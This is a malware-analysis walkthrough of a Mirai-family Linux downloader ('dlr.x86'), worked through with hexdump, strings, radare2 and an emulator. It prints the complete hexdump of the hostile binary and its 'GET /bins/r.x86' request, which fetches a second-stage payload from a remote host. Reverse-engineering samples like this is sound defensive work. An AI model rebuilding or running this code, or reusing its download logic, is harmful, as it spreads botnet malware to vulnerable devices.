1180
2021-02-03
File
File name upon detection: dlr.x86
File type: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
File hash: 423d61c325f762187a6165c459d83999f0a87cfcc2949de7da7967213bad86c8
File size: 1180 bytes
~ nm 1180
nm: 1180: no symbols
Intezer: #Mirai, https://analyze.intezer.com/#/files/423d61c325f762187a6165c459d83999f0a87cfcc2949de7da7967213bad86c8
Virustotal: https://www.virustotal.com/gui/file/423d61c325f762187a6165c459d83999f0a87cfcc2949de7da7967213bad86c8/relations
~ hexdump -C 423d61c325f762187a6165c459d83999f0a87cfcc2949de7da7967213bad86c8 | less
1 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
2 00000010 02 00 03 00 01 00 00 00 24 83 04 08 34 00 00 00 |........$...4...|
3 00000020 d4 03 00 00 00 00 00 00 34 00 20 00 03 00 28 00 |........4. ...(.|
4 00000030 05 00 04 00 01 00 00 00 00 00 00 00 00 80 04 08 |................|
5 00000040 00 80 04 08 b4 03 00 00 b4 03 00 00 05 00 00 00 |................|
6 00000050 00 10 00 00 01 00 00 00 b4 03 00 00 b4 93 04 08 |................|
7 00000060 b4 93 04 08 00 00 00 00 04 00 00 00 06 00 00 00 |................|
8 00000070 00 10 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 |....Q.td........|
9 00000080 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 |................|
10 00000090 04 00 00 00 55 89 e5 0f b6 55 08 0f b6 45 0c c1 |....U....U...E..|
11 000000a0 e2 18 c1 e0 10 09 c2 0f b6 4d 10 0f b6 45 14 c1 |.........M...E..|
12 000000b0 e1 08 09 c2 09 d1 5d 89 ca 89 c8 c1 e0 18 81 e2 |......].........|
13 000000c0 00 ff 00 00 c1 e2 08 09 d0 89 ca c1 ea 18 81 e1 |................|
14 000000d0 00 00 ff 00 c1 e9 08 09 ca 09 d0 c3 55 89 e5 83 |............U...|
15 000000e0 ec 10 ff 75 08 6a 01 e8 44 02 00 00 83 c4 10 c9 |...u.j..D.......|
16 000000f0 c3 55 89 e5 83 ec 10 ff 75 08 6a 06 e8 2f 02 00 |.U......u.j../..|
17 00000100 00 c9 c3 55 89 e5 83 ec 08 ff 75 10 ff 75 0c ff |...U......u..u..|
18 00000110 75 08 6a 05 e8 17 02 00 00 c9 c3 55 89 e5 83 ec |u.j........U....|
19 00000120 1c 8b 45 08 89 45 f4 8b 45 0c 89 45 f8 8b 45 10 |..E..E..E..E..E.|
20 00000130 89 45 fc 8d 45 f4 50 6a 03 6a 66 e8 f0 01 00 00 |.E..E.Pj.jf.....|
21 00000140 c9 c3 55 89 e5 83 ec 08 ff 75 10 ff 75 0c ff 75 |..U......u..u..u|
22 00000150 08 6a 04 e8 d8 01 00 00 c9 c3 55 89 e5 83 ec 08 |.j........U.....|
23 00000160 ff 75 10 ff 75 0c ff 75 08 6a 03 e8 c0 01 00 00 |.u..u..u.j......|
24 00000170 c9 c3 55 89 e5 83 ec 1c 8b 45 08 89 45 f4 8b 45 |..U......E..E..E|
25 00000180 0c 89 45 f8 8b 45 10 89 45 fc 8d 45 f4 50 6a 01 |..E..E..E..E.Pj.|
26 00000190 6a 66 e8 99 01 00 00 c9 c3 55 b8 7d 83 04 08 89 |jf.......U.}....|
27 000001a0 e5 57 56 53 81 ec ac 00 00 00 eb 01 40 80 38 00 |.WVS........@.8.|
28 000001b0 75 fa 2d 7d 83 04 08 89 85 50 ff ff ff 50 6a 02 |u.-}.....P...Pj.|
29 000001c0 68 81 83 04 08 6a 01 e8 76 ff ff ff 68 d2 00 00 |h....j..v...h...|
30 000001d0 00 66 c7 45 e0 02 00 6a 6e 66 c7 45 e2 00 50 68 |.f.E...jnf.E..Ph|
31 000001e0 ac 00 00 00 68 b9 00 00 00 e8 a6 fe ff ff 83 c4 |....h...........|
32 000001f0 1c 89 45 e4 68 ff 01 00 00 68 41 02 00 00 68 85 |..E.h....hA...h.|
33 00000200 83 04 08 e8 fb fe ff ff 83 c4 0c 89 c7 6a 00 6a |.............j.j|
34 00000210 01 6a 02 e8 5a ff ff ff 83 c4 10 89 c6 83 f8 ff |.j..Z...........|
35 00000220 74 05 83 ff ff 75 0d 83 ec 0c 6a 01 e8 ab fe ff |t....u....j.....|
36 00000230 ff 83 c4 10 50 8d 45 e0 6a 10 50 56 e8 da fe ff |....P.E.j.PV....|
37 00000240 ff 83 c4 10 89 c3 85 c0 79 1c f7 db 50 6a 04 68 |........y...Pj.h|
38 00000250 8d 83 04 08 6a 01 e8 e7 fe ff ff 89 1c 24 e8 79 |....j........$.y|
39 00000260 fe ff ff 83 c4 10 8b 9d 50 ff ff ff 50 83 c3 20 |........P...P.. |
40 00000270 53 68 92 83 04 08 56 e8 c6 fe ff ff 83 c4 10 39 |Sh....V........9|
41 00000280 d8 74 0d 83 ec 0c 6a 03 e8 4f fe ff ff 83 c4 10 |.t....j..O......|
42 00000290 31 db 50 8d 45 f3 6a 01 50 56 e8 bb fe ff ff 83 |1.P.E.j.PV......|
43 000002a0 c4 10 48 74 0d 83 ec 0c 6a 04 e8 2d fe ff ff 83 |..Ht....j..-....|
44 000002b0 c4 10 0f be 45 f3 c1 e3 08 09 c3 81 fb 0a 0d 0a |....E...........|
45 000002c0 0d 75 cf 8d 9d 60 ff ff ff 51 68 80 00 00 00 53 |.u...`...Qh....S|
46 000002d0 56 e8 84 fe ff ff 83 c4 10 85 c0 7e 0e 52 50 53 |V..........~.RPS|
47 000002e0 57 e8 5c fe ff ff 83 c4 10 eb d8 83 ec 0c 56 e8 |W.\...........V.|
48 000002f0 fd fd ff ff 89 3c 24 e8 f5 fd ff ff 83 c4 0c 6a |.....<$........j|
49 00000300 04 68 af 83 04 08 6a 01 e8 35 fe ff ff c7 04 24 |.h....j..5.....$|
50 00000310 05 00 00 00 e8 c3 fd ff ff 83 c4 10 8d 65 f4 5b |.............e.[|
51 00000320 5e 5f 5d c3 55 89 e5 5d e9 6c fe ff ff 90 90 90 |^_].U..].l......|
52 00000330 55 57 56 53 8b 6c 24 2c 8b 7c 24 28 8b 74 24 24 |UWVS.l$,.|$(.t$$|
53 00000340 8b 54 24 20 8b 4c 24 1c 8b 5c 24 18 8b 44 24 14 |.T$ .L$..\$..D$.|
54 00000350 cd 80 5b 5e 5f 5d 3d 01 f0 ff ff 0f 83 01 00 00 |..[^_]=.........|
55 00000360 00 c3 83 ec 0c 89 c2 f7 da e8 09 00 00 00 89 10 |................|
56 00000370 83 c8 ff 83 c4 0c c3 b8 b4 93 04 08 c3 78 38 36 |.............x86|
57 00000380 00 54 46 0a 00 44 61 77 64 32 41 44 00 4e 49 46 |.TF..Dawd2AD.NIF|
58 00000390 0a 00 47 45 54 20 2f 62 69 6e 73 2f 72 2e 78 38 |..GET /bins/r.x8|
59 000003a0 36 20 48 54 54 50 2f 31 2e 30 0d 0a 0d 0a 00 49 |6 HTTP/1.0.....I|
60 000003b0 4e 54 0a 00 00 2e 73 68 73 74 72 74 61 62 00 2e |NT....shstrtab..|
61 000003c0 74 65 78 74 00 2e 72 6f 64 61 74 61 00 2e 62 73 |text..rodata..bs|
62 000003d0 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |s...............|
63 000003e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
64 000003f0 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 |................|
65 00000400 01 00 00 00 06 00 00 00 94 80 04 08 94 00 00 00 |................|
66 00000410 e9 02 00 00 00 00 00 00 00 00 00 00 04 00 00 00 |................|
67 00000420 00 00 00 00 11 00 00 00 01 00 00 00 32 00 00 00 |............2...|
68 00000430 7d 83 04 08 7d 03 00 00 37 00 00 00 00 00 00 00 |}...}...7.......|
69 00000440 00 00 00 00 01 00 00 00 01 00 00 00 19 00 00 00 |................|
70 00000450 08 00 00 00 03 00 00 00 b4 93 04 08 b4 03 00 00 |................|
71 00000460 04 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 |................|
72 00000470 00 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00 |................|
73 00000480 00 00 00 00 b4 03 00 00 1e 00 00 00 00 00 00 00 |................|
74 00000490 00 00 00 00 01 00 00 00 00 00 00 00 |............|
75 0000049c
~ strings 1180
RPSW
[^_]
UWVS
[^_]=
Dawd2AD
GET /bins/r.x86 HTTP/1.0
.shstrtab
.text
.rodata
.bss
Tools
Ghidra v 9.2.1
Cutter v 1.12.0 Using r2-4.5.0-20-g293cf5ae6
Radare2 v radare2 5.0.1-git 26326 @ linux-x86-64 git.5.0.0
Strings
extract it to strings
Let's check strings:
~ strings 1180
RPSW
[^_]
UWVS
[^_]=
Dawd2AD
GET /bins/r.x86 HTTP/1.0
.shstrtab
.text
.rodata
.bss
Two of them are interesting: Dawd2AD and GET /bins/r.x86 HTTP/1.0.
Second one implies that there is HTTP communication. Let's check which function uses this string.
Load the sample into radare2 and check cross referenses to that string.
~ r2 1180
-- That's embarrassing.
[0x08048324]> aaaa
[0x08048324]> afl
0x08048324 18 404 entry0
0x08048330 3 71 fcn.08048330
0x08048377 1 6 fcn.08048377
0x08048142 1 24 fcn.08048142
0x08048094 1 72 fcn.08048094
0x08048103 1 24 fcn.08048103
0x08048172 1 39 fcn.08048172
0x080480dc 1 21 fcn.080480dc
0x0804811b 1 39 fcn.0804811b
0x0804815a 1 24 fcn.0804815a
0x080480f1 1 18 fcn.080480f1
[0x08048324]> afl~?
11
We have 11 functions detected by r2. Let's see strings:
[0x08048324]> iz
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00000385 0x08048385 7 8 .rodata ascii Dawd2AD
1 0x0000038d 0x0804838d 4 5 .rodata ascii NIF\n
2 0x00000392 0x08048392 28 29 .rodata ascii GET /bins/r.x86 HTTP/1.0\r\n\r\n
3 0x000003af 0x080483af 4 5 .rodata ascii INT\n
So string 2 is point of our interes. Let's check XREFS:
[0x08048324]> axt 0x08048392
entry0 0x8048271 [DATA] push str.GET__bins_r.x86_HTTP_1.0_r_n_r_n
From here we can see that this string is used at addr 0x8048271. Let's check it:
[0x08048324]> s 0x8048271
[0x08048271]> pd--4
│ ; CODE XREF from entry0 @ 0x8048248
│ 0x08048266 8b9d50ffffff mov ebx, dword [var_b0h]
│ 0x0804826c 50 push eax
│ 0x0804826d 83c320 add ebx, 0x20 ; 32
│ 0x08048270 53 push ebx
│ 0x08048271 6892830408 push str.GET__bins_r.x86_HTTP_1.0_r_n_r_n ; 0x8048392 ; "GET /bins/r.x86 HTTP/1.0\r\n\r\n" ; int32_t arg_ch
│ 0x08048276 56 push esi ; int32_t arg_8h
│ 0x08048277 e8c6feffff call fcn.08048142
│ 0x0804827c 83c410 add esp, 0x10
[0x08048271]>
The pd--4 command prints disassembly with some context. So from here we can see that GET.. string is being passed to the function fcn.08048142. Lets follow that call.
[0x08048271]> s fcn.08048142
[0x08048142]> pdf
; CALL XREFS from entry0 @ 0x80481c7, 0x8048256, 0x8048277, 0x80482e1, 0x8048308
╭ 24: fcn.08048142 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);
│ ; arg int32_t arg_8h @ ebp+0x8
│ ; arg int32_t arg_ch @ ebp+0xc
│ ; arg int32_t arg_10h @ ebp+0x10
│ 0x08048142 55 push ebp
│ 0x08048143 89e5 mov ebp, esp
│ 0x08048145 83ec08 sub esp, 8
│ 0x08048148 ff7510 push dword [arg_10h]
│ 0x0804814b ff750c push dword [arg_ch]
│ 0x0804814e ff7508 push dword [arg_8h]
│ 0x08048151 6a04 push 4 ; 4
│ 0x08048153 e8d8010000 call fcn.08048330
│ 0x08048158 c9 leave
╰ 0x08048159 c3 ret
...
[0x08048324]> pdf @ fcn.08048142
; CALL XREFS from entry0 @ 0x80481c7, 0x8048256, 0x8048277, 0x80482e1, 0x8048308
╭ 24: fcn.08048142 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);
│ ; arg int32_t arg_8h @ ebp+0x8
│ ; arg int32_t arg_ch @ ebp+0xc
│ ; arg int32_t arg_10h @ ebp+0x10
│ 0x08048142 55 push ebp
│ 0x08048143 89e5 mov ebp, esp
│ 0x08048145 83ec08 sub esp, 8
│ 0x08048148 ff7510 push dword [arg_10h]
│ 0x0804814b ff750c push dword [arg_ch]
│ 0x0804814e ff7508 push dword [arg_8h]
│ 0x08048151 6a04 push 4 ; 4
│ 0x08048153 e8d8010000 call fcn.08048330
│ 0x08048158 c9 leave
╰ 0x08048159 c3 ret
So this is the function with 3 arguments, which are passed down to the another function: fcn.08048330.
Let's check how many calls in this sample are to the current function, fcn.08048142:
entry0 0x80481c7 [CALL] call fcn.08048142
entry0 0x8048256 [CALL] call fcn.08048142
entry0 0x8048277 [CALL] call fcn.08048142
entry0 0x80482e1 [CALL] call fcn.08048142
entry0 0x8048308 [CALL] call fcn.08048142
The axt command means find data/code references to this address.
So we have 5 calls to that function. Nice.
Let's put this aside and go deeper: we need to check the fcn.08048330. Keep in mind the first argument of this function is 4 coming from address 0x08048151.
This function is being called from 7 places as axt~? shows.
What does it do?
Syscall
[0x08048330]> pdf
fcn.syscall_08048330 (int32_t syscall_code, int32_t arg_18h, int32_t arg_1ch, int32_t arg_20h, int32_t arg_24h, int32_t arg_28h, int32_t arg_2ch);
│ 0x08048330 55 push ebp
│ 0x08048331 57 push edi
│ 0x08048332 56 push esi
│ 0x08048333 53 push ebx
│ 0x08048334 8b6c242c mov ebp, dword [arg_2ch]
│ 0x08048338 8b7c2428 mov edi, dword [arg_28h]
│ 0x0804833c 8b742424 mov esi, dword [arg_24h]
│ 0x08048340 8b542420 mov edx, dword [arg_20h]
│ 0x08048344 8b4c241c mov ecx, dword [arg_1ch]
│ 0x08048348 8b5c2418 mov ebx, dword [arg_18h]
│ 0x0804834c 8b442414 mov eax, dword [syscall_code]
│ 0x08048350 cd80 int 0x80
...
At the address 0x08048350 we can see instruction cd80 or int 0x80 which is instruction to generate software interrupt. This is one of the ways for the program communicate with the Kernel.
Instruction Int. The argument of this instruction is an interrupt number. In our case this is 0x80 meaning this is systemcall.
This is a good thing, we can rename this function to fcn.syscall_08048142 with help of afn command: [0x08048142]> afn fcn.write_08048142.
In previous function we saw that first argument was 4, here we can see that this is a systemcall which name we can check with the help of command asl 4 which results in write.
So now we know that previous function is a wrapper for write systemcall. Let us see what arguments that function expects: ~ man 2 write manpage. The manpage says that arguments are as follow:
ssize_t write(int fd, const void *buf, size_t count); hence we can change function name and definition.
[0x08048142]> afn fcn.write_08048142
[0x08048142]> afvn fd arg_8h
[0x08048142]> afvn buf arg_ch
[0x08048142]> afvn count arg_10h
[0x08048142]> afvt fd int
[0x08048142]> afvt buf void*
[0x08048142]> afvt count size_t
Now our updated write function looks like this:
[0x08048142]> pdf
; CALL XREFS from entry0 @ 0x80481c7, 0x8048256, 0x8048277, 0x80482e1, 0x8048308
╭ 24: fcn.write_08048142 (int fd, void*buf, size_t count);
│ ; arg int fd @ ebp+0x8
│ ; arg void*buf @ ebp+0xc
│ ; arg size_t count @ ebp+0x10
│ 0x08048142 55 push ebp
│ 0x08048143 89e5 mov ebp, esp
│ 0x08048145 83ec08 sub esp, 8
│ 0x08048148 ff7510 push dword [count]
│ 0x0804814b ff750c push dword [buf]
│ 0x0804814e ff7508 push dword [fd]
│ 0x08048151 6a04 push 4 ; 4
│ 0x08048153 e8d8010000 call fcn.syscall_08048142
│ 0x08048158 c9 leave
╰ 0x08048159 c3 ret
[0x08048142]>
We have 2 functions specified. Let's stick to this approach and figure out what are other functions.
[0x08048199]> afl
0x08048324 18 404 entry0
0x08048330 3 71 fcn.syscall_08048330
0x08048377 1 6 fcn.08048377
0x08048142 1 24 fcn.write_08048142
0x08048094 1 72 fcn.08048094
0x08048103 1 24 fcn.08048103
0x08048172 1 39 fcn.08048172
0x080480dc 1 21 fcn.080480dc
0x0804811b 1 39 fcn.0804811b
0x0804815a 1 24 fcn.0804815a
0x080480f1 1 18 fcn.080480f1
From the write function we can see that syscall number is being passed to the syscall function, so we can try find other functions whcih follow pattern of push X; call syscall.
We can use r2 commnad /ad/ for that:
[0x08048142]> "/ad/ push ; call"
0x0804813b # 7: push 0x66; call fcn.syscall_08048330
0x08048192 # 7: push 0x66; call fcn.syscall_08048330
0x08048213 # 7: push 2; call fcn.08048172
0x0804822c # 7: push 1; call fcn.080480dc
0x08048277 # 6: push esi; call fcn.write_08048142
0x08048288 # 7: push 3; call fcn.080480dc
0x0804829a # 6: push esi; call fcn.0804815a
0x080482aa # 7: push 4; call fcn.080480dc
0x080482ef # 6: push esi; call fcn.080480f1
After using search command / we will have some "bookmarks" created in our namespace.
You can see them by command f~hit whcih means show flags and filter flags which contains word "hit". To remove search hits use command f-: f- hit*.
[0x0804813b]> f~hit
0x0804813b 7 hit1_0
0x08048192 7 hit1_1
0x08048213 7 hit1_2
0x0804822c 7 hit1_3
0x08048277 6 hit1_4
0x08048288 7 hit1_5
0x0804829a 6 hit1_6
0x080482aa 7 hit1_7
0x080482ef 6 hit1_8
These are our potential syscall wrappers. Lets check them all:
[0x0804813b]> s hit1_0; pd--2
│ 0x08048137 6a03 push 3 ; 3
│ 0x08048139 6a66 push 0x66 ; 'f' ; 102
│ ;-- hit1_0:
│ 0x0804813b e8f0010000 call fcn.syscall_08048330
│ 0x08048140 c9 leave
[0x0804813b]>
We can see that here immediate value 0x66 is being pushed onto the stack, so it would be the first argument to the syscall. Let's check what's that:
[0x0804813b]> asl 0x66
socketcall
Great. We just found socketcall wrapper. You can check it reading manpage 2: man 2 socketcall
Now we can rename that function. The afn. command shows in which function we currently are,
and afn allows as to rename current function.
[0x0804813b]> afn fcn.socketcall_0804811b 0x0804811b
[0x0804813b]> afn.
fcn.socketcall_0804811b
Let's go to the next function. Next hit: s hit1_1
[0x0804813b]> s hit1_1
[0x08048192]> pd--2
│ 0x0804818e 6a01 push 1 ; 1
│ 0x08048190 6a66 push 0x66 ; 'f' ; 102
│ ;-- hit1_1:
│ 0x08048192 e899010000 call fcn.syscall_08048330
│ 0x08048197 c9 leave
[0x08048192]> afn
fcn.08048172
[0x08048192]> pdf
; CALL XREF from entry0 @ 0x8048213
╭ 39: fcn.08048172 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);
│ ; var int32_t var_ch @ ebp-0xc
│ ; var int32_t var_8h @ ebp-0x8
│ ; var int32_t var_4h @ ebp-0x4
│ ; arg int32_t arg_8h @ ebp+0x8
│ ; arg int32_t arg_ch @ ebp+0xc
│ ; arg int32_t arg_10h @ ebp+0x10
│ 0x08048172 55 push ebp
│ 0x08048173 89e5 mov ebp, esp
│ 0x08048175 83ec1c sub esp, 0x1c
│ 0x08048178 8b4508 mov eax, dword [arg_8h]
│ 0x0804817b 8945f4 mov dword [var_ch], eax
│ 0x0804817e 8b450c mov eax, dword [arg_ch]
│ 0x08048181 8945f8 mov dword [var_8h], eax
│ 0x08048184 8b4510 mov eax, dword [arg_10h]
│ 0x08048187 8945fc mov dword [var_4h], eax
│ 0x0804818a 8d45f4 lea eax, [var_ch]
│ 0x0804818d 50 push eax
│ 0x0804818e 6a01 push 1 ; 1
│ 0x08048190 6a66 push 0x66 ; 'f' ; 102
│ ;-- hit1_1:
│ 0x08048192 e899010000 call fcn.syscall_08048330
│ 0x08048197 c9 leave
╰ 0x08048198 c3 ret
From here we can see that we call that syscall wrapper with argument 0x66 as well, but previous argument is different from what we have in fcn.socketcall_0804811b.
What's going on here?
Socketcall
We can find needed information in the manpage.
Declaration of the function:
int socketcall(int call, unsigned long *args);
In $ man 2 socketcall in the "Notes" section we can see
46 On x86-32, socketcall() was historically the only entry point for the sockets API. However, starting in Linux 4.3, direct system calls are provided on x86-32 for the s 47 ets API. This facilitates the creation of seccomp(2) filters that filter sockets system calls (for new user-space binaries that are compiled to use the new entry poi 48 and also provides a (very) small performance improvement.
And list of calls. We are intereted only in calls number 1, 3. They are numbered in natural order, starting from 1:
| number | name | manpage |
|---|---|---|
| 1 | SYS_SOCKET | socket(2) |
| 2 | . | . |
| 3 | SYS_CONNECT | connect(2) |
From this table we can see that our two unknown function are actually syscall_socket and syscall_connect.
Let's rename functions:
afn fcn.socketcall_scocket_08048172 0x08048172
afn fcn.socketcall_connect_0804811b 0x0804811b
Good. Two more functions half-detected.
Let's come back to our syscalls. Check what we have so far:
[0x08048172]> afl
0x08048324 18 404 entry0
0x08048330 3 71 fcn.syscall_08048330
0x08048377 1 6 fcn.08048377
0x08048142 1 24 fcn.write_08048142
0x08048094 1 72 fcn.08048094
0x08048103 1 24 fcn.08048103
0x08048172 1 39 fcn.socketcall_scocket_08048172
0x080480dc 1 21 fcn.080480dc
0x0804811b 1 39 fcn.socketcall_connect_0804811b
0x0804815a 1 24 fcn.0804815a
0x080480f1 1 18 fcn.080480f1
Check function fcn.08048377
[0x08048377]> pdf @ fcn.08048377
; CALL XREF from fcn.syscall_08048330 @ 0x8048369
╭ 6: fcn.08048377 ();
│ bp: 0 (vars 0, args 0)
│ sp: 0 (vars 0, args 0)
│ rg: 0 (vars 0, args 0)
│ 0x08048377 b8b4930408 mov eax, segment.LOAD1 ; 0x80493b4
╰ 0x0804837c c3 ret
[0x08048377]>
It returns some data. We can rename it to fcn.get_DATA.
We can skip 0x08048094 1 72 fcn.08048094 for now, since it's rather big.
Next one is fcn.08048103 which is of the same size as fcn.write_08048142.
[0x08048377]> pdf @ fcn.08048103
; CALL XREF from entry0 @ 0x8048203
╭ 24: fcn.08048103 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);
│ ; arg int32_t arg_8h @ ebp+0x8
│ ; arg int32_t arg_ch @ ebp+0xc
│ ; arg int32_t arg_10h @ ebp+0x10
│ 0x08048103 55 push ebp
│ 0x08048104 89e5 mov ebp, esp
│ 0x08048106 83ec08 sub esp, 8
│ 0x08048109 ff7510 push dword [arg_10h]
│ 0x0804810c ff750c push dword [arg_ch]
│ 0x0804810f ff7508 push dword [arg_8h]
│ 0x08048112 6a05 push 5 ; 5
│ 0x08048114 e817020000 call fcn.syscall_08048330
│ 0x08048119 c9 leave
╰ 0x0804811a c3 ret
Syscall is invoked in this function, with syscall_code 5. We know how to check the name of syscall and where is the info about it (hint: manpage).
asl 5
open
We can rename this function now as fcn.open_08048103 via afn command.
[0x08048377]> afl
0x08048324 18 404 entry0
0x08048330 3 71 fcn.syscall_08048330
0x08048377 1 6 fcn.get_DATA
0x08048142 1 24 fcn.write_08048142
0x08048094 1 72 fcn.08048094
0x08048103 1 24 fcn.open_08048103
0x08048172 1 39 fcn.socketcall_scocket_08048172
0x080480dc 1 21 fcn.080480dc
0x0804811b 1 39 fcn.socketcall_connect_0804811b
0x0804815a 1 24 fcn.0804815a
0x080480f1 1 18 fcn.080480f1
[0x08048377]> pdf @ fcn.080480dc
; XREFS: CODE 0x08048076 CALL 0x0804822c CALL 0x0804825e CALL 0x08048288 CALL 0x080482aa CALL 0x08048314
╭ 21: fcn.080480dc (int32_t arg_8h);
│ ; arg int32_t arg_8h @ ebp+0x8
│ 0x080480dc 55 push ebp
│ 0x080480dd 89e5 mov ebp, esp
│ 0x080480df 83ec10 sub esp, 0x10
│ 0x080480e2 ff7508 push dword [arg_8h]
│ 0x080480e5 6a01 push 1 ; 1
│ 0x080480e7 e844020000 call fcn.syscall_08048330
│ 0x080480ec 83c410 add esp, 0x10
│ 0x080480ef c9 leave
╰ 0x080480f0 c3 ret
[0x08048377]> asl 1
exit
This one is exit. Rename it with afn as well.
Check another one:
[0x08048330]> s fcn.0804815a
[0x0804815a]> pdf
; CALL XREFS from entry0 @ 0x804829a, 0x80482d1
╭ 24: fcn.0804815a (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);
│ ; arg int32_t arg_8h @ ebp+0x8
│ ; arg int32_t arg_ch @ ebp+0xc
│ ; arg int32_t arg_10h @ ebp+0x10
│ 0x0804815a 55 push ebp
│ 0x0804815b 89e5 mov ebp, esp
│ 0x0804815d 83ec08 sub esp, 8
│ 0x08048160 ff7510 push dword [arg_10h]
│ 0x08048163 ff750c push dword [arg_ch]
│ 0x08048166 ff7508 push dword [arg_8h]
│ 0x08048169 6a03 push 3 ; 3
│ 0x0804816b e8c0010000 call fcn.syscall_08048330
│ 0x08048170 c9 leave
╰ 0x08048171 c3 ret
[0x0804815a]> asl 3
read
[0x0804815a]>
This one stands for read. Rename it as well: afn fcn.read_0804815a 0x0804815a
And one more from the list:
[0x0804815a]> pdf @ fcn.080480f1
; CALL XREFS from entry0 @ 0x80482ef, 0x80482f7
╭ 18: fcn.080480f1 (int32_t arg_8h);
│ ; arg int32_t arg_8h @ ebp+0x8
│ 0x080480f1 55 push ebp
│ 0x080480f2 89e5 mov ebp, esp
│ 0x080480f4 83ec10 sub esp, 0x10
│ 0x080480f7 ff7508 push dword [arg_8h]
│ 0x080480fa 6a06 push 6 ; 6
│ 0x080480fc e82f020000 call fcn.syscall_08048330
│ 0x08048101 c9 leave
╰ 0x08048102 c3 ret
[0x0804815a]> asl 6
close
[0x0804815a]>
Looks like it's a close. Let's rename it: afn fcn.close_080480f1 0x080480f1
Now we have this:
[0x08048330]> afl
0x08048324 18 404 entry0
0x08048330 3 71 fcn.syscall_08048330
0x08048377 1 6 fcn.get_DATA
0x08048142 1 24 fcn.write_08048142
0x08048094 1 72 fcn.08048094
0x08048103 1 24 fcn.open_08048103
0x08048172 1 39 fcn.socketcall_scocket_08048172
0x080480dc 1 21 fcn.exit_080480dc
0x0804811b 1 39 fcn.socketcall_connect_0804811b
0x0804815a 1 24 fcn.read_0804815a
0x080480f1 1 18 fcn.close_080480f1
The last one left for dissection: fcn.08048094.
This one is biggest function, but let's start. First let's check disassembly:
[0x08048330]> s fcn.08048094
> pdf
╭ 72: fcn.08048094 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h, int32_t arg_14h);
│ ; arg int32_t arg_8h @ ebp+0x8
│ ; arg int32_t arg_ch @ ebp+0xc
│ ; arg int32_t arg_10h @ ebp+0x10
│ ; arg int32_t arg_14h @ ebp+0x14
│ 0x08048094 55 push ebp ; [01] -r-x section size 745 named .text
│ 0x08048095 89e5 mov ebp, esp
│ 0x08048097 0fb65508 movzx edx, byte [arg_8h]
│ 0x0804809b 0fb6450c movzx eax, byte [arg_ch]
│ 0x0804809f c1e218 shl edx, 0x18
│ 0x080480a2 c1e010 shl eax, 0x10
│ 0x080480a5 09c2 or edx, eax
│ 0x080480a7 0fb64d10 movzx ecx, byte [arg_10h]
│ 0x080480ab 0fb64514 movzx eax, byte [arg_14h]
│ 0x080480af c1e108 shl ecx, 8
│ 0x080480b2 09c2 or edx, eax
│ 0x080480b4 09d1 or ecx, edx
│ 0x080480b6 5d pop ebp
│ 0x080480b7 89ca mov edx, ecx
│ 0x080480b9 89c8 mov eax, ecx
│ 0x080480bb c1e018 shl eax, 0x18
│ 0x080480be 81e200ff0000 and edx, 0xff00
│ 0x080480c4 c1e208 shl edx, 8
│ 0x080480c7 09d0 or eax, edx
│ 0x080480c9 89ca mov edx, ecx
│ 0x080480cb c1ea18 shr edx, 0x18
│ 0x080480ce 81e10000ff00 and ecx, 0xff0000
│ 0x080480d4 c1e908 shr ecx, 8
│ 0x080480d7 09ca or edx, ecx
│ 0x080480d9 09d0 or eax, edx
╰ 0x080480db c3 ret
- XXX Describe this functions
We can render it as an image, but before we need to get it as dot format.
Check ag? help message.
[0x08048330]> s entry0
[0x08048324]> agcd > callgraph.dot
Check the file:
$ cat callgraph.dot
digraph code {
rankdir=LR;
outputorder=edgesfirst;
graph [bgcolor=azure fontname="Courier" splines="curved"];
node [penwidth=4 fillcolor=white style=filled fontname="Courier Bold" fontsize=14 shape=box];
edge [arrowhead="normal" style=bold weight=2];
"0x08048324" [label="entry0" URL="entry0/0x08048324"];
"0x08048324" -> "0x08048142" [color="#61afef" URL="fcn.write_08048142/0x08048142"];
"0x08048142" [label="fcn.write_08048142" URL="fcn.write_08048142/0x08048142"];
"0x08048324" -> "0x08048094" [color="#61afef" URL="fcn.packIP_08048094/0x08048094"];
"0x08048094" [label="fcn.packIP_08048094" URL="fcn.packIP_08048094/0x08048094"];
"0x08048324" -> "0x08048103" [color="#61afef" URL="fcn.open_08048103/0x08048103"];
"0x08048103" [label="fcn.open_08048103" URL="fcn.open_08048103/0x08048103"];
"0x08048324" -> "0x08048172" [color="#61afef" URL="fcn.socketcall_scocket_08048172/0x08048172"];
"0x08048172" [label="fcn.socketcall_scocket_08048172" URL="fcn.socketcall_scocket_08048172/0x08048172"];
"0x08048324" -> "0x080480dc" [color="#61afef" URL="fcn.exit_080480dc/0x080480dc"];
"0x080480dc" [label="fcn.exit_080480dc" URL="fcn.exit_080480dc/0x080480dc"];
"0x08048324" -> "0x0804811b" [color="#61afef" URL="fcn.socketcall_connect_0804811b/0x0804811b"];
"0x0804811b" [label="fcn.socketcall_connect_0804811b" URL="fcn.socketcall_connect_0804811b/0x0804811b"];
"0x08048324" -> "0x0804815a" [color="#61afef" URL="fcn.read_0804815a/0x0804815a"];
"0x0804815a" [label="fcn.read_0804815a" URL="fcn.read_0804815a/0x0804815a"];
"0x08048324" -> "0x080480f1" [color="#61afef" URL="fcn.close_080480f1/0x080480f1"];
"0x080480f1" [label="fcn.close_080480f1" URL="fcn.close_080480f1/0x080480f1"];
}
And convert it:
dot -Tpng callgraph.dot > callgraph.png
Good, from this picture we can see that we all these functions are called from the entry0 function.
Now as we see what are all these functions we can try to launch it under emulator. We can use zelos for that. Install it and run the sample:
$ zelos 1180
Plugins: trace, overlay, runner, syscalllimiter, yarascan
22:41:48:hooks_____:INFO__:Reached entrypoint 0x8048324
[StdOut]: 'b'TF''
